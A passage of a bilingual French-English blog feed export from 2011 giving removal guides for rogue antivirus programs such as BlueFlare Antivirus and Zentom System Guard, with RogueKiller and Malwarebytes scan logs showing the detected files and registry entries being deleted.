Dossier(s) infecté(s): 0&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Fichier(s) infecté(s): 2&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Processus mémoire infecté(s):&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
(Aucun élément nuisible détecté)&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Module(s) mémoire infecté(s):&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
(Aucun élément nuisible détecté)&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Clé(s) du Registre infectée(s):&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
(Aucun élément nuisible détecté)&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Valeur(s) du Registre infectée(s):&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
(Aucun élément nuisible détecté)&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Elément(s) de données du Registre infecté(s):&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
(Aucun élément nuisible détecté)&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Dossier(s) infecté(s):&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
(Aucun élément nuisible détecté)&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Fichier(s) infecté(s):&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
c:\documents and settings\tigzy\application data\AVS\svchost.exe (Trojan.Agent) -&amp;gt; Quarantined and deleted successfully.&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
c:\documents and settings\tigzy\Bureau\rk_quarantine\svchost.exe.vir (Trojan.Agent) -&amp;gt; Quarantined and deleted successfully.&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Le rogue devrait être supprimé -- The rogue must have been deleted &lt;/li&gt;
&lt;/ul&gt;&lt;img src="http://feeds.feedburner.com/~r/Tigzy-rk/~4/KDBueerYosU" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://tigzyrk.blogspot.com/feeds/17971380695153891/comments/default" title="Publier les commentaires" /><link rel="replies" type="text/html" href="http://tigzyrk.blogspot.com/2011/08/rogue-antivirus-2011.html#comment-form" title="0 commentaires" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/17971380695153891?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/17971380695153891?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Tigzy-rk/~3/KDBueerYosU/rogue-antivirus-2011.html" title="[Rogue] Antivirus 2011" /><author><name>tigzy-RK</name><uri>http://www.blogger.com/profile/09732073712132941191</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://2.bp.blogspot.com/-ZTcduhIm5tM/TamcgoAE1dI/AAAAAAAAABg/Gqy2hRs5Vy0/s220/tigzy1295109643.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-iDLiGcASxzA/TktcYVa1o3I/AAAAAAAAAEA/JT95oCJub08/s72-c/Capture.PNG" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://tigzyrk.blogspot.com/2011/08/rogue-antivirus-2011.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DUQMQn88cCp7ImA9WhRTFEU.&quot;"><id>tag:blogger.com,1999:blog-8972660870357177426.post-3083961637672473811</id><published>2011-07-23T09:37:00.000-07:00</published><updated>2011-11-05T03:03:03.178-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-05T03:03:03.178-07:00</app:edited><title>[Rogue] BlueFlare Antivirus</title><content type="html">&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt;Comment supprimer BlueFlare Antivirus&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt;How to get rid of BlueFlare Antivirus&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-W_kLsWoVi7w/TglyEw5ZtgI/AAAAAAAAADA/FzUtNEovK5M/s1600/MSREmovalTool.PNG" style="margin-left: 1em; margin-right: 1em;"&gt; &lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-WcHLv5JtjSo/TirlUC7coPI/AAAAAAAAAD0/hEOFrBxEi5M/s1600/zsgu1.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-dyQaOpMW0UE/Tir4RlfaOgI/AAAAAAAAAD8/dTpdiLw9Yus/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="480" src="http://3.bp.blogspot.com/-dyQaOpMW0UE/Tir4RlfaOgI/AAAAAAAAAD8/dTpdiLw9Yus/s640/Capture.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://i.ytimg.com/vi/DCwnSXmV2Tg/0.jpg" height="375" width="600"&gt;&lt;param name="movie" value="http://www.youtube.com/v/DCwnSXmV2Tg?f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" /&gt;

&lt;param name="bgcolor" value="#FFFFFF" /&gt;

&lt;embed width="600" height="375"  src="http://www.youtube.com/v/DCwnSXmV2Tg?f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" type="application/x-shockwave-flash"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Télécharger et lancer &lt;a href="http://www.sur-la-toile.com/RogueKiller/"&gt;RogueKiller&lt;/a&gt; en mode 2 (Suppression) -- Download and start &lt;a href="http://www.sur-la-toile.com/RogueKiller/"&gt;RogueKiller&lt;/a&gt; with mode 2 (Delete)&lt;/li&gt;
&lt;li&gt;Si le rogue empêche le lancement du programme -- If you're unable to launch the program&lt;/li&gt;
&lt;/ul&gt;
&lt;ol&gt;
&lt;li&gt; Si les associations de fichiers ne sont pas activées:    Renommer en "winlogon" ou "firefox". Sinon renommer en winlogon.exe ou    firefox.exe (rajouter l'extension .exe) -- If the file associations are    not set: Rename as "winlogon" or "firefox", else rename it with the   .exe  extension (firefox.exe or winlogon.exe) &lt;/li&gt;
&lt;li&gt;Essayer de lancer à nouveau le programme -- Try again to start the program&lt;/li&gt;
&lt;/ol&gt;
&lt;ul&gt;
&lt;li&gt;Vous devriez avoir le rapport suivant -- You should obtain the following report&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote style="color: #444444;"&gt;
&lt;span style="font-size: x-small;"&gt;RogueKiller V5.2.8 [23/07/2011] par Tigzy&lt;br /&gt;
contact sur http://www.sur-la-toile.com&lt;br /&gt;
mail: tigzyRK&amp;lt;at&amp;gt;gmail&amp;lt;dot&amp;gt;com&lt;br /&gt;
Remontees: http://www.sur-la-toile.com/discussion-193725-1-BRogueKillerD-Remontees.html&lt;br /&gt;
&lt;br /&gt;
Systeme d'exploitation: Windows XP (5.1.2600 Service Pack 3) 32 bits version&lt;br /&gt;
Demarrage : Mode normal&lt;br /&gt;
Utilisateur: tigzy [Droits d'admin]&lt;br /&gt;
Mode: Suppression -- Date : 23/07/2011 18:30:54&lt;br /&gt;
&lt;br /&gt;
Processus malicieux: 3&lt;br /&gt;
[SUSP PATH] BlueFlare Antivirus.exe -- c:\documents and settings\tigzy\application data\blueflare antivirus\blueflare antivirus.exe -&amp;gt; KILLED&lt;br /&gt;
[SUSP PATH] csrss.exe -- c:\documents and settings\tigzy\application data\blueflare antivirus\csrss.exe -&amp;gt; KILLED&lt;br /&gt;
[BLACKLIST] csrss.exe -- c:\documents and settings\tigzy\menu démarrer\programmes\démarrage\csrss.exe -&amp;gt; KILLED&lt;br /&gt;
&lt;br /&gt;
Entrees de registre: 1&lt;br /&gt;
[BLACKLIST] csrss.exe : C:\Documents and Settings\tigzy\Menu Démarrer\Programmes\Démarrage\csrss.exe -&amp;gt; DELETED&lt;br /&gt;
&lt;br /&gt;
Fichier HOSTS:&lt;br /&gt;
127.0.0.1&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; localhost&lt;br /&gt;
::1&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; localhost&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Termine : &amp;lt;&amp;lt; RKreport[2].txt &amp;gt;&amp;gt;&lt;br /&gt;
RKreport[1].txt ; RKreport[2].txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Ensuite passer un scan avec &lt;a href="http://www.malwarebytes.org/mbam-download.php"&gt;Malwarebytes&lt;/a&gt; -- Then do a scan with &lt;a href="http://www.malwarebytes.org/mbam-download.php"&gt;Malwarebytes&lt;/a&gt; &lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;Le rogue devrait être supprimé -- The rogue should have been deleted &lt;/li&gt;
&lt;/ul&gt;&lt;img src="http://feeds.feedburner.com/~r/Tigzy-rk/~4/veJT3Ypq7B8" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://tigzyrk.blogspot.com/feeds/3083961637672473811/comments/default" title="Publier les commentaires" /><link rel="replies" type="text/html" href="http://tigzyrk.blogspot.com/2011/07/rogue-blueflare-antivirus.html#comment-form" title="0 commentaires" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/3083961637672473811?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/3083961637672473811?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Tigzy-rk/~3/veJT3Ypq7B8/rogue-blueflare-antivirus.html" title="[Rogue] BlueFlare Antivirus" /><author><name>tigzy-RK</name><uri>http://www.blogger.com/profile/09732073712132941191</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://2.bp.blogspot.com/-ZTcduhIm5tM/TamcgoAE1dI/AAAAAAAAABg/Gqy2hRs5Vy0/s220/tigzy1295109643.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-dyQaOpMW0UE/Tir4RlfaOgI/AAAAAAAAAD8/dTpdiLw9Yus/s72-c/Capture.PNG" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://tigzyrk.blogspot.com/2011/07/rogue-blueflare-antivirus.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DUMARHw9eip7ImA9WhRTFEU.&quot;"><id>tag:blogger.com,1999:blog-8972660870357177426.post-8545995848947261150</id><published>2011-07-23T08:25:00.000-07:00</published><updated>2011-11-05T03:04:05.262-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-05T03:04:05.262-07:00</app:edited><title>[Rogue]  Zentom System Guard</title><content type="html">&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="color: #3d85c6;"&gt;Comment supprimer Zentom System Guard&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="color: #3d85c6;"&gt;How to get rid of Zentom System Guard&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;Ce rogue fait croire à une mise à jour Windows update -- This rogue try to cheat the user with a Windows Update popup:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-W_kLsWoVi7w/TglyEw5ZtgI/AAAAAAAAADA/FzUtNEovK5M/s1600/MSREmovalTool.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-WcHLv5JtjSo/TirlUC7coPI/AAAAAAAAAD0/hEOFrBxEi5M/s1600/zsgu1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="476" src="http://4.bp.blogspot.com/-WcHLv5JtjSo/TirlUC7coPI/AAAAAAAAAD0/hEOFrBxEi5M/s640/zsgu1.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-1NGM3dL1nuM/TirlUhwkYbI/AAAAAAAAAD4/kMQZXv5G9Os/s1600/zsgu2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="432" src="http://4.bp.blogspot.com/-1NGM3dL1nuM/TirlUhwkYbI/AAAAAAAAAD4/kMQZXv5G9Os/s640/zsgu2.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-m9zZE_L7tcY/TircITnlFGI/AAAAAAAAADw/FojZDHMXUns/s1600/Capture.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://i.ytimg.com/vi/fTyFCJKuVT4/0.jpg" height="375" width="600"&gt;&lt;param name="movie" value="http://www.youtube.com/v/fTyFCJKuVT4?f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" /&gt;

&lt;param name="bgcolor" value="#FFFFFF" /&gt;

&lt;embed width="600" height="375"  src="http://www.youtube.com/v/fTyFCJKuVT4?f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" type="application/x-shockwave-flash"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="color: #3d85c6;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Télécharger et lancer &lt;a href="http://www.sur-la-toile.com/RogueKiller/"&gt;RogueKiller&lt;/a&gt; en mode 2 (Suppression) -- Download and start &lt;a href="http://www.sur-la-toile.com/RogueKiller/"&gt;RogueKiller&lt;/a&gt; with mode 2 (Delete)&lt;/li&gt;
&lt;li&gt;Si le rogue empêche le lancement du programme -- If you're unable to launch the program&lt;/li&gt;
&lt;/ul&gt;
&lt;ol&gt;
&lt;li&gt; Si les associations de fichiers ne sont pas activées:   Renommer en "winlogon" ou "firefox". Sinon renommer en winlogon.exe ou   firefox.exe (rajouter l'extension .exe) -- If the file associations are   not set: Rename as "winlogon" or "firefox", else rename it with the  .exe  extension (firefox.exe or winlogon.exe) &lt;/li&gt;
&lt;li&gt;Essayer de lancer à nouveau le programme -- Try again to start the program&lt;/li&gt;
&lt;/ol&gt;
&lt;ul&gt;
&lt;li&gt;Vous devriez avoir le rapport suivant -- You should obtain the following report&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote style="color: #444444;"&gt;
&lt;span style="font-size: x-small;"&gt;RogueKiller V5.2.7 [30/06/2011] par Tigzy&lt;br /&gt;
contact sur http://www.sur-la-toile.com&lt;br /&gt;
mail: tigzyRK&amp;lt;at&amp;gt;gmail&amp;lt;dot&amp;gt;com&lt;br /&gt;
Remontees: http://www.sur-la-toile.com/discussion-193725-1-BRogueKillerD-Remontees.html&lt;br /&gt;
&lt;br /&gt;
Systeme d'exploitation: Windows XP (5.1.2600 Service Pack 3) 32 bits version&lt;br /&gt;
Demarrage : Mode normal&lt;br /&gt;
Utilisateur: tigzy [Droits d'admin]&lt;br /&gt;
Mode: Suppression -- Date : 23/07/2011 17:15:42&lt;br /&gt;
&lt;br /&gt;
Processus malicieux: 1&lt;br /&gt;
[SUSP PATH] vcc70dep2r.exe -- c:\documents and settings\tigzy\application data\bab785534d470ccbe1a0ab21efefa0da\vcc70dep2r.exe -&amp;gt; KILLED&lt;br /&gt;
&lt;br /&gt;
Entrees de registre: 2&lt;br /&gt;
[SUSP PATH] HKCU\[...]\Run : vcc70dep2r.exe ("C:\Documents and Settings\tigzy\Application Data\BAB785534D470CCBE1A0AB21EFEFA0DA\vcc70dep2r.exe") -&amp;gt; DELETED&lt;br /&gt;
[SUSP PATH] Zentom System Guard.lnk : C:\Documents and Settings\tigzy\Application Data\BAB785534D470CCBE1A0AB21EFEFA0DA\vcc70dep2r.exe -&amp;gt; DELETED&lt;br /&gt;
&lt;br /&gt;
Fichier HOSTS:&lt;br /&gt;
127.0.0.1&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; localhost&lt;br /&gt;
::1&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; localhost&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Termine : &amp;lt;&amp;lt; RKreport[2].txt &amp;gt;&amp;gt;&lt;br /&gt;
RKreport[1].txt ; RKreport[2].txt&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Ensuite passer un scan avec &lt;a href="http://www.malwarebytes.org/mbam-download.php"&gt;Malwarebytes&lt;/a&gt; -- Then do a scan with &lt;a href="http://www.malwarebytes.org/mbam-download.php"&gt;Malwarebytes&lt;/a&gt;&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;span style="font-size: x-small;"&gt;&lt;span style="color: #666666;"&gt;&lt;span style="color: #444444;"&gt;Malwarebytes' Anti-Malware 1.51.1.1800&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
www.malwarebytes.org&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Version de la base de données: 7250&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Windows 5.1.2600 Service Pack 3&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Internet Explorer 6.0.2900.5512&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
23/07/2011 17:25:03&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
mbam-log-2011-07-23 (17-25-03).txt&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Type d'examen: Examen rapide&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Elément(s) analysé(s): 138095&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Temps écoulé: 1 minute(s), 36 seconde(s)&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Processus mémoire infecté(s): 0&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Module(s) mémoire infecté(s): 0&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Clé(s) du Registre infectée(s): 2&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Valeur(s) du Registre infectée(s): 0&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Elément(s) de données du Registre infecté(s): 0&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Dossier(s) infecté(s): 1&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Fichier(s) infecté(s): 6&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Processus mémoire infecté(s):&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
(Aucun élément nuisible détecté)&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Module(s) mémoire infecté(s):&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
(Aucun élément nuisible détecté)&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Clé(s) du Registre infectée(s):&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
HKEY_CURRENT_USER\SOFTWARE\ZentomSystemGuard (Rogue.ZentomSystemGuard) -&amp;gt; Quarantined and deleted successfully.&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Zentom System Guard (Rogue.ZentomSystemGuard) -&amp;gt; Quarantined and deleted successfully.&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Valeur(s) du Registre infectée(s):&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
(Aucun élément nuisible détecté)&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Elément(s) de données du Registre infecté(s):&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
(Aucun élément nuisible détecté)&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Dossier(s) infecté(s):&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
c:\documents and settings\tigzy\menu démarrer\programmes\zentom system guard (Rogue.ZentomSystemGuard) -&amp;gt; Quarantined and deleted successfully.&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Fichier(s) infecté(s):&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
c:\documents and settings\tigzy\Bureau\zentomsystemguard.exe (Trojan.FakeAlert) -&amp;gt; Quarantined and deleted successfully.&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
c:\documents and settings\tigzy\local settings\temporary internet files\Content.IE5\ZXYKNMW2\zentomsystemguard[1].vir (Trojan.FakeAlert) -&amp;gt; Quarantined and deleted successfully.&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
c:\documents and settings\tigzy\Bureau\zentom system guard.lnk (Rogue.ZentomSystemGuard) -&amp;gt; Quarantined and deleted successfully.&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
c:\documents and settings\tigzy\application data\microsoft\internet explorer\quick launch\zentom system guard.lnk (Rogue.ZentomSystemGuard) -&amp;gt; Quarantined and deleted successfully.&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
c:\documents and settings\tigzy\menu démarrer\programmes\zentom system guard\zentom system guard.lnk (Rogue.ZentomSystemGuard) -&amp;gt; Quarantined and deleted successfully.&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
c:\documents and settings\tigzy\menu démarrer\programmes\zentom system guard\uninstall.lnk (Rogue.ZentomSystemGuard) -&amp;gt; Quarantined and deleted successfully.&lt;/span&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="color: #666666;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Le rogue devrait être supprimé -- The rogue should have been deleted &lt;/li&gt;
&lt;/ul&gt;&lt;img src="http://feeds.feedburner.com/~r/Tigzy-rk/~4/OVsOWAAunU4" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://tigzyrk.blogspot.com/feeds/8545995848947261150/comments/default" title="Publier les commentaires" /><link rel="replies" type="text/html" href="http://tigzyrk.blogspot.com/2011/07/rogue-zentom-system-guard.html#comment-form" title="0 commentaires" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/8545995848947261150?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/8545995848947261150?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Tigzy-rk/~3/OVsOWAAunU4/rogue-zentom-system-guard.html" title="[Rogue]  Zentom System Guard" /><author><name>tigzy-RK</name><uri>http://www.blogger.com/profile/09732073712132941191</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://2.bp.blogspot.com/-ZTcduhIm5tM/TamcgoAE1dI/AAAAAAAAABg/Gqy2hRs5Vy0/s220/tigzy1295109643.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-WcHLv5JtjSo/TirlUC7coPI/AAAAAAAAAD0/hEOFrBxEi5M/s72-c/zsgu1.PNG" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://tigzyrk.blogspot.com/2011/07/rogue-zentom-system-guard.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DUICSH09eip7ImA9WhRTFEU.&quot;"><id>tag:blogger.com,1999:blog-8972660870357177426.post-5245631825766388667</id><published>2011-07-23T07:42:00.000-07:00</published><updated>2011-11-05T03:06:09.362-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-05T03:06:09.362-07:00</app:edited><title>[Rogue] Security Protection</title><content type="html">&lt;div style="text-align: center;"&gt;
